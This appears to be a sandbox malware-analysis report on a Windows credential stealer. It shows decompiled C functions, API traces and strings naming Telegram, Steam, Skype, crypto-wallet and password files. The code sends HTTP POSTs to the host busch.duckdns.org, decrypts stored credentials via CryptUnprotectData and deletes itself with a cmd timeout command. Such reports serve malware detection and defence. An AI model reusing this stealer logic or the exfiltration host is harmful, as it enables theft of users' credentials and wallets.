                                                                                                                                                                                          0x00419902
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041932a
                                                                                                                                                                                          0x00419321

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00419195
                                                                                                                                                                                            • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                            • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00419460
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00419468
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00419F2B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
                                                                                                                                                                                          • String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                          			E00418688(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				_Unknown_base(*)()* _v20;
                                                                                                                                                                                          				_Unknown_base(*)()* _v24;
                                                                                                                                                                                          				_Unknown_base(*)()* _v28;
                                                                                                                                                                                          				_Unknown_base(*)()* _v32;
                                                                                                                                                                                          				_Unknown_base(*)()* _v36;
                                                                                                                                                                                          				_Unknown_base(*)()* _v40;
                                                                                                                                                                                          				_Unknown_base(*)()* _v44;
                                                                                                                                                                                          				_Unknown_base(*)()* _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				void* _v64;
                                                                                                                                                                                          				void* _v68;
                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                          				char _v73;
                                                                                                                                                                                          				signed int _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                          				char _v132;
                                                                                                                                                                                          				char _v388;
                                                                                                                                                                                          				char _v516;
                                                                                                                                                                                          				char _v644;
                                                                                                                                                                                          				char _v2692;
                                                                                                                                                                                          				char _v3716;
                                                                                                                                                                                          				char _v3776;
                                                                                                                                                                                          				char _v69412;
                                                                                                                                                                                          				char _v69416;
                                                                                                                                                                                          				char _v69420;
                                                                                                                                                                                          				char _v69424;
                                                                                                                                                                                          				char _v69428;
                                                                                                                                                                                          				char _v69432;
                                                                                                                                                                                          				char _v69436;
                                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                                          				long _t223;
                                                                                                                                                                                          				long _t284;
                                                                                                                                                                                          				void* _t298;
                                                                                                                                                                                          				struct HINSTANCE__* _t321;
                                                                                                                                                                                          				struct HINSTANCE__* _t325;
                                                                                                                                                                                          				void* _t326;
                                                                                                                                                                                          				intOrPtr _t328;
                                                                                                                                                                                          				intOrPtr _t351;
                                                                                                                                                                                          				void* _t358;
                                                                                                                                                                                          				struct _SYSTEMTIME _t369;
                                                                                                                                                                                          				intOrPtr* _t371;
                                                                                                                                                                                          				intOrPtr _t373;
                                                                                                                                                                                          				intOrPtr _t374;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t373 = _t374;
                                                                                                                                                                                          				_t328 = 0x21e6;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t328 = _t328 - 1;
                                                                                                                                                                                          				} while (_t328 != 0);
                                                                                                                                                                                          				_push(_t328);
                                                                                                                                                                                          				_t1 =  &_v8;
                                                                                                                                                                                          				 *_t1 = _t328;
                                                                                                                                                                                          				_v16 =  *_t1;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E00403980(_v8);
                                                                                                                                                                                          				E00403980(_v12);
                                                                                                                                                                                          				E00403980(_v16);
                                                                                                                                                                                          				_t369 =  &_v3776;
                                                                                                                                                                                          				_push(_t373);
                                                                                                                                                                                          				_push(0x418b80);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t374;
                                                                                                                                                                                          				if(_v16 == 0) {
                                                                                                                                                                                          					E0040357C( &_v16, 0x418b98);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				E004034E4( &_v92);
                                                                                                                                                                                          				E0040357C( &_v56, _v8);
                                                                                                                                                                                          				_v73 = 0;
                                                                                                                                                                                          				E0040357C( &_v52, "wininet.dll");
                                                                                                                                                                                          				_t325 = GetModuleHandleA(E004039E8( &_v52));
                                                                                                                                                                                          				if(_t325 == 0) {
                                                                                                                                                                                          					_t321 = LoadLibraryA(E004039E8( &_v52)); // executed
                                                                                                                                                                                          					_t325 = _t321;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				if(_t325 == 0) {
                                                                                                                                                                                          					(E004039E8( &_v52))[7] = 0;
                                                                                                                                                                                          					_t325 = LoadLibraryA(E004039E8( &_v52));
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_v20 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0xc]));
                                                                                                                                                                                          				_v24 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x1a]));
                                                                                                                                                                                          				_v28 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x2b]));
                                                                                                                                                                                          				_v32 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x3c]));
                                                                                                                                                                                          				_v36 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x53]));
                                                                                                                                                                                          				_v40 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x64]));
                                                                                                                                                                                          				_t371 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x75]));
                                                                                                                                                                                          				_v44 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x89]));
                                                                                                                                                                                          				_v48 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x9b]));
                                                                                                                                                                                          				E00404F00();
                                                                                                                                                                                          				E00404F00();
                                                                                                                                                                                          				E00404F00();
                                                                                                                                                                                          				E00404F00();
                                                                                                                                                                                          				E00404F00();
                                                                                                                                                                                          				E00404F00();
                                                                                                                                                                                          				E00404F00();
                                                                                                                                                                                          				 *_t369 = 0x3c;
                                                                                                                                                                                          				 *((intOrPtr*)(_t369 + 4)) =  &_v132;
                                                                                                                                                                                          				 *((intOrPtr*)(_t369 + 8)) = 0x20;
                                                                                                                                                                                          				 *(_t369 + 0x10) =  &_v388;
                                                                                                                                                                                          				 *((intOrPtr*)(_t369 + 0x14)) = 0x100;
                                                                                                                                                                                          				 *((intOrPtr*)(_t369 + 0x1c)) =  &_v516;
                                                                                                                                                                                          				 *((intOrPtr*)(_t369 + 0x20)) = 0x80;
                                                                                                                                                                                          				 *((intOrPtr*)(_t369 + 0x24)) =  &_v644;
                                                                                                                                                                                          				 *((intOrPtr*)(_t369 + 0x28)) = 0x80;
                                                                                                                                                                                          				 *(_t369 + 0x2c) =  &_v2692;
                                                                                                                                                                                          				 *((intOrPtr*)(_t369 + 0x30)) = 0x800;
                                                                                                                                                                                          				 *((intOrPtr*)(_t369 + 0x34)) =  &_v3716;
                                                                                                                                                                                          				 *((intOrPtr*)(_t369 + 0x38)) = 0x400;
                                                                                                                                                                                          				_t223 = E00403790(_v56);
                                                                                                                                                                                          				InternetCrackUrlA(E00403990(_v56), _t223, 0x90000000, _t369);
                                                                                                                                                                                          				E004036DC( &_v100,  *(_t369 + 0x10));
                                                                                                                                                                                          				E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
                                                                                                                                                                                          				if(E00403A78(0x418c60, _v69416) != 0) {
                                                                                                                                                                                          					_v73 = 1;
                                                                                                                                                                                          					E004036DC( &_v69420,  *(_t369 + 0x10));
                                                                                                                                                                                          					E004037DC( &_v88, _v69420, "Host: ");
                                                                                                                                                                                          					E00417F6C(_v100, _t325,  &_v69424, _t369, _t371);
                                                                                                                                                                                          					 *(_t369 + 0x10) = E00403990(_v69424);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t326 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
                                                                                                                                                                                          				 *(_t369 + 0x10) = 0x41b7c0;
                                                                                                                                                                                          				_v84 = 0x2dc6c0;
                                                                                                                                                                                          				_v48(_t326, 6,  &_v84, 4);
                                                                                                                                                                                          				_v48(_t326, 5,  &_v84, 4);
                                                                                                                                                                                          				_v64 = InternetConnectA(_t326,  *(_t369 + 0x10),  *(_t369 + 0x18), 0, 0, 3, 0, 0);
                                                                                                                                                                                          				if(_v64 != 0) {
                                                                                                                                                                                          					_v80 = 0x84003300;
                                                                                                                                                                                          					E004036DC( &_v69428,  *((intOrPtr*)(_t369 + 4)));
                                                                                                                                                                                          					if(E00403A78(0x418cb4, _v69428) != 0) {
                                                                                                                                                                                          						_v80 = _v80 | 0x00800000;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t369 + 0x2c), 0, 0, 0, _v80, 0);
                                                                                                                                                                                          					if(_v68 != 0) {
                                                                                                                                                                                          						if(_v73 != 0) {
                                                                                                                                                                                          							_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_t284 = E00403790(_v12);
                                                                                                                                                                                          						if(HttpSendRequestA(_v68, E00418CB8, 0, E00403990(_v12), _t284) != 0) {
                                                                                                                                                                                          							do {
                                                                                                                                                                                          								E00404F00();
                                                                                                                                                                                          								_v72 = _v40(_v68,  &_v69412, 0x10064,  &_v60);
                                                                                                                                                                                          								E004035D4( &_v96, _v60,  &_v69412);
                                                                                                                                                                                          								_t298 = E00403798( &_v92, _v96);
                                                                                                                                                                                          								asm("sbb eax, eax");
                                                                                                                                                                                          							} while (_t298 + 1 != 0 && _v60 != 0);
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					InternetCloseHandle(_v68); // executed
                                                                                                                                                                                          				}
                                                                                                                                                                                          				 *_t371(_v64);
                                                                                                                                                                                          				 *_t371(_t326);
                                                                                                                                                                                          				if(_v92 == 0) {
                                                                                                                                                                                          					_push(_v100);
                                                                                                                                                                                          					_push(_v12);
                                                                                                                                                                                          					_push( *(_t369 + 0x18));
                                                                                                                                                                                          					_push( &_v92);
                                                                                                                                                                                          					E004036DC( &_v69432,  *(_t369 + 0x2c));
                                                                                                                                                                                          					_push(_v69432);
                                                                                                                                                                                          					E004036DC( &_v69436,  *(_t369 + 0x10));
                                                                                                                                                                                          					_pop(_t358); // executed
                                                                                                                                                                                          					E00418124(_v69436, _t326, _v16, _t358, _t371); // executed
                                                                                                                                                                                          				}
                                                                                                                                                                                          				E00403538(_a4, _v92);
                                                                                                                                                                                          				E004034E4( &_v92);
                                                                                                                                                                                          				_pop(_t351);
                                                                                                                                                                                          				 *[fs:eax] = _t351;
                                                                                                                                                                                          				_push(E00418B87);
                                                                                                                                                                                          				E00403508( &_v69436, 6);
                                                                                                                                                                                          				E00403508( &_v100, 4);
                                                                                                                                                                                          				E00403508( &_v56, 2);
                                                                                                                                                                                          				return E00403508( &_v16, 3);
                                                                                                                                                                                          			}























































                                                                                                                                                                                          0x00418b40
                                                                                                                                                                                          0x00418b43
                                                                                                                                                                                          0x00418b53
                                                                                                                                                                                          0x00418b60
                                                                                                                                                                                          0x00418b6d
                                                                                                                                                                                          0x00418b7f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackModuleSend
                                                                                                                                                                                          • String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$busch.duckdns.org$wininet.dll
                                                                                                                                                                                          • API String ID: 3386017226-2673238456
                                                                                                                                                                                          • Opcode ID: 54202a251d383afa9b440f1367a32a84581cecc305caedb9dc7d948c89e5b3e5
                                                                                                                                                                                          • Instruction ID: 8c20cc009bbb13acc87624f3a171753233ac08310759435a2e91fadf7e7a38d5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 54202a251d383afa9b440f1367a32a84581cecc305caedb9dc7d948c89e5b3e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E1EBB1910218ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B7681DB78AA458B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040955E() {
                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                          				struct HINSTANCE__* _t2;
                                                                                                                                                                                          				_Unknown_base(*)()* _t3;
                                                                                                                                                                                          
                                                                                                                                                                                          				 *0x41c7cc =  *0x41c7cc - 1;
                                                                                                                                                                                          				if( *0x41c7cc < 0) {
                                                                                                                                                                                          					_t2 = LoadLibraryA("crypt32.dll"); // executed
                                                                                                                                                                                          					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
                                                                                                                                                                                          					 *0x41c7c8 = _t3;
                                                                                                                                                                                          					return _t3;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return _t1;
                                                                                                                                                                                          			}







                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                          • API String ID: 2574300362-1827663648
                                                                                                                                                                                          • Opcode ID: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
                                                                                                                                                                                          • Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 27%
                                                                                                                                                                                          			E00407C58() {
                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                          				short _v10;
                                                                                                                                                                                          				char _v14;
                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                          				union _SID_NAME_USE _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _t21;
                                                                                                                                                                                          				short _t22;
                                                                                                                                                                                          				intOrPtr _t24;
                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                          				intOrPtr* _t42;
                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t54 = _t56;
                                                                                                                                                                                          				_t57 = _t56 + 0xffffffe0;
                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                          				_t21 =  *0x41b0d0; // 0x0
                                                                                                                                                                                          				_v14 = _t21;
                                                                                                                                                                                          				_t22 =  *0x41b0d4; // 0x500
                                                                                                                                                                                          				_v10 = _t22;
                                                                                                                                                                                          				_t24 =  *0x41b0cc; // 0x12
                                                                                                                                                                                          				_t26 =  *0x41b5b0; // 0x41c720
                                                                                                                                                                                          				 *((intOrPtr*)( *_t26))( &_v14, 1, _t24, 0, 0, 0, 0, 0, 0, 0,  &_v28, _t53);
                                                                                                                                                                                          				if(_v28 == 0) {
                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					 *[fs:eax] = _t57;
                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                          					LookupAccountSidA(0, _v28, 0,  &_v20, 0,  &_v24,  &_v32); // executed
                                                                                                                                                                                          					_t42 =  *0x41b56c; // 0x41c72c
                                                                                                                                                                                          					_t44 =  *((intOrPtr*)( *_t42))(0, _v28,  &_v36,  *[fs:eax], 0x407d16, _t54); // executed
                                                                                                                                                                                          					if(_t44 != 0) {
                                                                                                                                                                                          						_v8 = _v36;
                                                                                                                                                                                          					} else {
                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_pop(_t52);
                                                                                                                                                                                          					 *[fs:eax] = _t52;
                                                                                                                                                                                          					_push(E00407D1D);
                                                                                                                                                                                          					return FreeSid(_v28);
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}























                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
                                                                                                                                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
                                                                                                                                                                                          • FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AccountCheckFreeLookupMembershipToken
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1602037265-0
                                                                                                                                                                                          • Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                                                                                                                                          • Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                                                                                                                                          • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CheckFreeMembershipToken
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3914140973-0
                                                                                                                                                                                          • Opcode ID: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                                                                                                                                          • Instruction ID: aed4e80559fb2a14190837efd407bda22eaf0f983d9af5a1b784dce0b7ff3491
                                                                                                                                                                                          • Opcode Fuzzy Hash: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60214F75A48388BEE701DBA8CC41FAE77FCEB09704F4084B6E610E3291D775AA098759
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                                                                                                                                          • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CheckFreeMembershipToken
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3914140973-0
                                                                                                                                                                                          • Opcode ID: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                                                                                                                                          • Instruction ID: f84fb7a27dacd8e4143a25a8c882f6f2bfcd0e0861e01e35ab8e7fc80b6cb224
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A216075A48248BEE701CBA8CC81FAE77F8EB0D704F5084B6F610E36D1D775AA058B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                          			E00407500(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4, char _a8) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                          				char _v536;
                                                                                                                                                                                          				intOrPtr* _t43;
                                                                                                                                                                                          				intOrPtr* _t52;
                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                          				intOrPtr _t63;
                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                          
                                                                                                                                                                                          				_v12 = __ecx;
                                                                                                                                                                                          				_v8 = __edx;
                                                                                                                                                                                          				_t56 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				E004040F4( &_v12);
                                                                                                                                                                                          				_push(_t67);
                                                                                                                                                                                          				_push(0x4075e3);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t67 + 0xfffffdec;
                                                                                                                                                                                          				_v20 = 0xfe;
                                                                                                                                                                                          				_v536 = 0;
                                                                                                                                                                                          				if(_a8 != 1) {
                                                                                                                                                                                          					RegOpenKeyExW(_t56, E00403D3C(_v8), 0, 0x20019,  &_v24); // executed
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_t52 =  *0x41b574; // 0x41c71c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t52))(_t56, E00403D3C(_v8), 0, 0x20119,  &_v24);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
                                                                                                                                                                                          				E00403D10(_a4, 0x100,  &_v536);
                                                                                                                                                                                          				_t43 =  *0x41b58c; // 0x41c718
                                                                                                                                                                                          				 *((intOrPtr*)( *_t43))(); // executed
                                                                                                                                                                                          				_t63 = _t56;
                                                                                                                                                                                          				 *[fs:eax] = _t63;
                                                                                                                                                                                          				_push(E004075EA);
                                                                                                                                                                                          				return E00403B98( &_v12, 2);
                                                                                                                                                                                          			}

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocOpenQueryStringValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4139485348-0
                                                                                                                                                                                          • Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                                                                                                                                          • Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E004033F4() {
                                                                                                                                                                                          				struct HINSTANCE__* _t24;
                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                          				intOrPtr _t35;
                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                          
                                                                                                                                                                                          				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
                                                                                                                                                                                          					L3:
                                                                                                                                                                                          					if( *0x41b004 != 0) {
                                                                                                                                                                                          						E004032DC();
                                                                                                                                                                                          						E00403368(_t32);
                                                                                                                                                                                          						 *0x41b004 = 0;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L5:
                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                          						if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
